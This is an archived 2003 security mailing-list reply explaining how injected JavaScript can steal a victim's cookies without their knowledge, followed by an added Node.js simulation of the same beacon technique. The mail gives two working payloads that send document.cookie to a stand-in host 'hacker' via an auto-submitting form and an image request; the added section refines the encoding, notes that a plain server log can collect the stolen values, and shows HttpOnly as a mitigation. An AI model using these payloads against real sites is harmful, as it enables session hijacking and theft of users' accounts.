RE: Proof of Concept Tool on Web Application Security
From: Nicolas Gregoire (ngregoire@exaprobe.com)
Date: 04/14/03
- Previous message: Dawes, Rogan (ZA - Johannesburg): "RE: Proof of Concept Tool on Web Application Security"
- In reply to: Indian Tiger: "RE: Proof of Concept Tool on Web Application Security"
- Next in thread: Robert Auger: "RE: Proof of Concept Tool on Web Application Security"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: Nicolas Gregoire <ngregoire@exaprobe.com>
To: Indian Tiger <indiantiger@mailandnews.com>
Date: 14 Apr 2003 17:23:31 +0200
On Sun, 2003-04-13 at 09:33, Indian Tiger wrote:
> One way of transferring cookie information from the victim’s machine to the
> attacker’s machine is to create a hidden field, then transfer the cookie
> information to that hidden field, and then post (submit) this hidden field to the
> web site of the attacker. But this requires interaction of the victim, as the victim must click
> on the submit button to post this data to the attacker’s site, which is not a good
> idea; the data should be transferred without the knowledge of the victim.
I'm not sure I fully understand your problem, but you can:
- use Javascript to submit a form
<!-- submit the form as soon as the page has loaded; no click from the victim is needed -->
<body onLoad="document.forms.upld.submit();">
<form method="post" name="upld" action="http://hacker/cgi-bin/grab.pl">
<!-- hidden field(s) carrying the data to be posted to the attacker's site -->
<input ....>
</form>
- transfer the cookie via an IMG tag and some Javascript
<img name="owned" src="http://hacker/cool.gif">
<script>
// rewriting the image source makes the browser issue a GET to grab.pl
// with the URL-escaped cookie in the query string; nothing is displayed
document.owned.src="http://hacker/cgi-bin/grab.pl?data="
+escape(document.cookie);
</script>
That's just some of the many ways to steal cookies.
Enjoy ...
--
Nicolas Gregoire ----- Information Systems Security Consultant
ngregoire@exaprobe.com ------[ ExaProbe ]------ http://www.exaprobe.com/
PGP KeyID:CA61B44F FingerPrint:1CC647FF1A55664BA2D2AFDACA6A21DACA61B44F
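Editor's note: the following is an added example and is not part of the mail above or of any tool its author wrote. It models the IMG-beacon trick end to end under Node.js, with no browser and no network: the "browser side" builds the beacon URL the payload writes into the image's src, the "grab.pl side" recovers the cookie from the query string, and a small Set-Cookie parser shows which cookies document.cookie would expose in the first place. The host "hacker" and the path /cgi-bin/grab.pl are taken from the post; the cookie names and values are constructed sample data. It also swaps escape() for encodeURIComponent() and shows why.

```javascript
// Added example, not from the original mail. Runs offline under Node.js.
// Host "hacker" and path /cgi-bin/grab.pl come from the post; the
// Set-Cookie values below are constructed sample data.

// Parse Set-Cookie header values into {name, value, httpOnly, secure} records.
function parseSetCookie(headers) {
  return headers.map((h) => {
    const [pair, ...attrs] = h.split(';').map((s) => s.trim());
    const eq = pair.indexOf('=');
    const rec = { name: pair.slice(0, eq), value: pair.slice(eq + 1), httpOnly: false, secure: false };
    for (const a of attrs) {
      const key = a.split('=')[0].trim().toLowerCase();
      if (key === 'httponly') rec.httpOnly = true;
      if (key === 'secure') rec.secure = true;
    }
    return rec;
  });
}

// What injected script sees as document.cookie: only cookies set WITHOUT
// HttpOnly are exposed, joined as "name=value; name2=value2".
function scriptVisibleCookie(headers) {
  return parseSetCookie(headers)
    .filter((c) => !c.httpOnly)
    .map((c) => `${c.name}=${c.value}`)
    .join('; ');
}

// Browser side of the payload: the URL written into the image's src.
// encodeURIComponent replaces the post's escape(): escape() leaves "+"
// untouched, and a CGI query parser turns a bare "+" into a space.
function beaconUrl(cookieString, base = 'http://hacker/cgi-bin/grab.pl') {
  return base + '?data=' + encodeURIComponent(cookieString);
}

// Same URL built with the legacy escape() from the post, for comparison.
function legacyBeaconUrl(cookieString, base = 'http://hacker/cgi-bin/grab.pl') {
  return base + '?data=' + escape(cookieString);
}

// Server side (what grab.pl would do): pull "data" back out of the query
// string, percent-decoding and treating "+" as a space like a CGI parser does.
function recoverCookie(url) {
  return new URL(url).searchParams.get('data');
}

// Constructed sample: the same session cookie issued with and without HttpOnly.
const WEAK_SET_COOKIE = ['SESSIONID=abc123; Path=/', 'theme=dark+blue; Path=/'];
const HARDENED_SET_COOKIE = ['SESSIONID=abc123; Path=/; HttpOnly; Secure', 'theme=dark+blue; Path=/'];

// Run the attack against both cookie policies and return what the attacker gets.
function demo() {
  const weak = scriptVisibleCookie(WEAK_SET_COOKIE);
  const hardened = scriptVisibleCookie(HARDENED_SET_COOKIE);
  return {
    stolenFromWeak: recoverCookie(beaconUrl(weak)),          // session id leaks
    stolenFromHardened: recoverCookie(beaconUrl(hardened)),  // only the theme cookie
    legacyEscapeMangles: recoverCookie(legacyBeaconUrl(weak)), // "dark+blue" becomes "dark blue"
  };
}

console.log(demo());
```

Two practical points the block makes concrete. First, the attacker's side does not need grab.pl to do anything clever: the query string lands in the web server's access log, so a bare HTTP server is enough to collect cookies. Second, a cookie issued with the HttpOnly flag never appears in document.cookie, so neither the form nor the IMG variant can read it; that flag is the usual server-side mitigation against this class of cookie theft, and the test above shows the session id disappearing from the beacon as soon as it is set.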